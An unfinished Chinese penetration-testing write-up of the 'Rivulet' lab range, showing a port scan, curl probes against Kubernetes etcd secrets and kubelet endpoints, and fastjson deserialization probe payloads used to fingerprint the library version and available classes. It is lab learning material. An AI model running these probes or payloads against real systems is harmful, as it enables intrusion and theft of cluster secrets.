目录

  1. 1. 前言
  2. 2. 外网
    1. 2.1. 信息收集

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

春秋云境 Rivulet(未完成)

2026/4/24 渗透 春秋云境
字数统计: 536字   |   阅读时长: 2分   |   总文章阅读量:

前言

漏洞提权、特权容器、信息泄露、域渗透

参考: https://mp.weixin.qq.com/s/Alz-DFfAbJUQWNm1qmsNgQ

外网

信息收集

[-] start ping
 {icmp} 121.89.86.15    up
[*] live Hosts num: 1
 121.89.86.15: [22 2379 2380 6443 8080 10250 10251 10252]
[*] alive ports len is: 8
[*] start vulscan
[*] WebTitle http://121.89.86.15:10251 code:404 len:19     title:None
[*] WebTitle http://121.89.86.15:10252 code:404 len:19     title:None
[*] WebTitle https://121.89.86.15:10250 code:200 len:104    title:None
[*] WebTitle https://121.89.86.15:6443 code:403 len:233    title:None
已完成 0/8 [-] webtitle https://121.89.86.15:2379 Get "https://121.89.86.15:2379": remote error: tls: bad certificate 
已完成 1/8 [-] webtitle https://121.89.86.15:2380 Get "https://121.89.86.15:2380": remote error: tls: bad certificate 
[*] WebTitle http://121.89.86.15:8080  code:302 len:0      title:None 跳转url: http://121.89.86.15:8080/login;jsessionid=10D577817821DAF086B62F031E19765A
[*] WebTitle http://121.89.86.15:8080/login;jsessionid=10D577817821DAF086B62F031E19765A code:400 len:277    title:None
已完成 2/8 [-] webtitle https://121.89.86.15:8080/login;jsessionid=10D577817821DAF086B62F031E19765A Get "https://121.89.86.15:8080/login;jsessionid=10D577817821DAF086B62F031E19765A": http: server gave HTTP response to HTTPS client

尝试打 k8s

curl -k https://121.89.86.15:2379/v2/keys/registry/secrets/default\?recursive\=true
curl: (35) LibreSSL/3.3.6: error:1401E412:SSL routines:CONNECT_CR_FINISHED:sslv3 alert bad certificate

❯ curl -k https://121.89.86.15:10250/pods
<h1>403 Forbidden</h1>
Access denied by nginx whitelist.
<br>
Please access via the correct IP address.

2379 需要证书,10250 没权限

8080 的 web 服务可以直接无帐密登录进去,进去有这么一段话

Hello User - Admin

Welcome to the "My" forum. We hope you can find the knowledge and assistance you need here.
flaghunt2 - admin

hello_json_file

进去是一个 create post,抓包发现是传入 json,创建成功返回 302,失败返回 500

使用 fastjson 探测

测试 dnslog

{
  "content":{"@type":"java.net.Inet4Address","val":"dnslog.com"}
}

posts 返回 dnslog.com/13.223.25.84,但是 dnslog 端没接收到记录,说明不出网

{
  "title": {"@type": "com.sun.rowset.JdbcRowSetImpl"}
}

posts 返回 com.sun.rowset.JdbcRowSetImpl@64afa2de,说明 fastjson 版本是 1.2.24

探测类

{
  "title": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "org.apache.tomcat.dbcp.dbcp.BasicDataSource"
}}

返回 500 则说明存在这个包,测试结果:

org.apache.catalina.startup.Tomcat
org.springframework.web.bind.annotation.RequestMapping
com.sun.org.apache.bcel.internal.util.ClassLoader
com.sun.rowset.JdbcRowSetImpl

只有 bcel 和 jdbc,但是 bcel 缺少 org.apache.tomcat 包打不了